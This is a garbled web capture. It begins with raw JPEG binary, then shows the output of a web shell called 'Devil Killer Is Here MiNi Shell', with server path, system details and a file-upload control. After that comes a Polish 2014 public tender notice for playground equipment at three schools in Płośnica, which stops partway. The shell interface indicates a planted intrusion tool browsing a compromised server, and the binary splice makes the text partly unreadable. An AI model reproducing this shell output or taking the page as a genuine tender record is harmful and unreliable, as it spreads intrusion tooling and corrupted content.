JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140821/277656-N-2014.html

<p class="kh_header"><b>Płośnica: Doposażenie placów zabaw przy szkołach podstawowych w ramach realizacji projektu pn. Modernizacja oddziałów przedszkolnych na terenie gminy Płośnica współfinansowanego 
z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 277656 - 2014; data zamieszczenia: 21.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Płośnica , ul. Dworcowa 52, 13-206 Płośnica, woj. warmińsko-mazurskie, tel. 023 6968008, faks 023 6968005.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.plosnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie placów zabaw przy szkołach podstawowych w ramach realizacji projektu pn. Modernizacja oddziałów przedszkolnych na terenie gminy Płośnica współfinansowanego 
z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie w zakresie szczegółowym obejmuje następujące części:
Część 1: Doposażenie placu zabaw przy Szkole Podstawowej w Gródkach. Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0proc.. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pow.h 95,2m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 21,3m2. Nawierzchnie powinny spełniać normy EN-1177:2008praz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 60,15m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3proc ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
linarium stożek - 1 szt.;
kosz na piłki mini- 1 szt;
tablica kółko i krzyżyk - 1 szt;
sześciokąt z pajęczyną i ścianką wspinaczkową - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - konik - 1 szt.;
huśtawka metalowa pojedyncza z zawiesiem z siedziskiem huśtawkowym typu bocianie gniazdo - 1 szt.;
c)	dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)	wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm.
Część 2: Doposażenie placu zabaw przy Szkole Podstawowej w Niechłoninie
Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0%. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pow. 99m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 20,00m2. Nawierzchnie powinny spełniać normy EN-1177:2008 oraz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 60,40m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3% ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
huśtawka wagowa - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - konik - 1 szt.;
sprężynowiec - auto - 1 szt.;
sprężynowiec - kaczątko - 1 szt.
huśtawka metalowa pojedyncza z zawiesiem z siedziskiem huśtawkowym typu bocianie gniazdo - 1 szt.;
c)	dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)	wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm.
Część 3: doposażenie placu zabaw przy Szkole Podstawowej w Wielkim Łęcku.
Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0%. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pow. 103,00m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 17,00m2. Nawierzchnie powinny spełniać normy EN-1177:2008 oraz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 59,40 m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3% ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
zestaw zabawowy - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - motor - 1 szt.;
domek drewniany - 1 szt.;
c)	dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm.
Zakres zamówienia w poszczególnych częściach szczegółowo określa Załącznik nr 1 SIWZ - dokumentacja projektowa oraz Załącznik nr 2 SIWZ - przedmiar robót
Zamawiający dopuszcza składanie ofert na poszczególne części zamówienia lub na całość zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-7, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w następujących wysokościach
1.w przypadku składania ofert na całość zamówienia wadium należy wnieść w wysokości: 4 600,00 zł
.2.	 w przypadku składania oferty na Część 1 zamówienia:  Doposażenie placu zabaw przy Szkole Podstawowej w Gródkach: wadium w wysokości: 1 800,00 zł;
3.	w przypadku składania oferty na Część 2 zamówienia: Doposażenie placu zabaw przy Szkole Podstawowej w Niechłoninie - wadium w wysokości: 1 300,00 zł;
.4.	w przypadku składania oferty na Część 3 zamówienia: Doposażenie placu zabaw przy Szkole Podstawowej w  Wielkim Łęcku- wadium w wysokości: 1 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału przez Wykonawcę w trybie art. 22 ust. 1 pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału przez Wykonawcę w trybie art. 22 ust. 1 pzp oraz poprzez wykazanie robót budowlanych zrealizowanych przez Wykonawcę w okresie ostatnich 5 lat przed upływem terminu składania ofert 
(w przypadku, gdy okres działalności Wykonawcy jest krótszy - w tym okresie) wraz z podaniem ich rodzaju 
i wartości, daty i miejsca wykonania oraz załączeniem dowodów poświadczających, że roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia jeżeli wykaże się wykonaniem minimum 2 robót budowlanych polegających na budowie placów zabaw, a każda z tych robót była o wartości minimum 50 000,00 zł netto.  Wykazywane roboty muszą odpowiadać swoim rodzajem przedmiotowi zamówienia. Zamawiający uzna, że wykazana robota budowlana odpowiada swoim rodzajem przedmiotowi zamówienia tj. obejmowała swoim zakresem roboty w zakresie wykonania nawierzchni oraz montażu urządzeń na palcu zabaw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału przez Wykonawcę w trybie art. 22 ust. 1 pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału przez Wykonawcę w trybie art. 22 ust. 1 pzp oraz poprzez  wykazanie dysponowania kierownikiem robót posiadającym wykształcenie, kwalifikacje oraz uprawnienia do wykonywania samodzielnych   funkcji w budownictwie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału przez Wykonawcę w trybie art. 22 ust. 1 pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia jeżeli wykaże się wykonaniem minimum 2 robót budowlanych polegających na budowie placów zabaw, a każda z tych robót była o wartości minimum 50 000,00 zł netto.  Wykazywane roboty muszą odpowiadać swoim rodzajem przedmiotowi zamówienia. Zamawiający uzna, że wykazana robota budowlana odpowiada swoim rodzajem przedmiotowi zamówienia tj. obejmowała swoim zakresem roboty w zakresie wykonania nawierzchni oraz montażu urządzeń na palcu zabaw.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oryginał pełnomocnictwa udzielonego osobom podpisującym ofertę o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego;
b)	oryginał pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku: 
a)	przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;
b)	wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
c)	wystąpienia siły wyższej, wydarzeń nieprzewidywalnych i poza kontrolą stron niniejszej umowy, występujących po podpisaniu umowy i powodujących niemożliwość wywiązania się z umowy w jej obecnym brzmieniu np. niesprzyjające warunki atmosferyczne, nawałnice klęski żywiołowe, huragan, oraz inne nadzwyczajne wydarzenia, których zaistnienie leży poza zasięgiem i kontrolą układających się stron. 
.2.	Wystąpienia w trakcie realizacji zamówienia zmian obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. 
3.Zaistnienia w umowie omyłki rachunkowej bądź pisarskiej w zakresie dotyczącym poprawienia omyłki.
4.	W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem 
o dokonanie zmian w przedmiotowej umowie.
19.2.	Zmiana umowy może nastąpić wyłącznie w formie pisemnej, pod rygorem nieważności takiego oświadczenia. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. 
5.	Powyższe postanowienia nie stanowią zobowiązania Zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.plosnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Płośnicy ul. Dworcowa 52 13-206 Płośnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 10:00, miejsce: Urząd Gminy w Płośnicy ul. Dworcowa 52 13-206 Płośnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dofinansowane z Programu Operacyjnego Kapitał Ludzki ze środków Europejskiego Funduszu Społecznego w ramach realizacji projektu pn Modernizacja oddziałów przedszkolnych na terenie gminy Płosnica.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doposażenie placu zabaw przy Szkole Podstawowej w Gródkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1: Doposażenie placu zabaw przy Szkole Podstawowej w Gródkach. Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0%. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pomierzch 95,2m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 21,3m2. Nawierzchnie powinny spełniać normy EN-1177:2008praz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 60,15m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3% ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
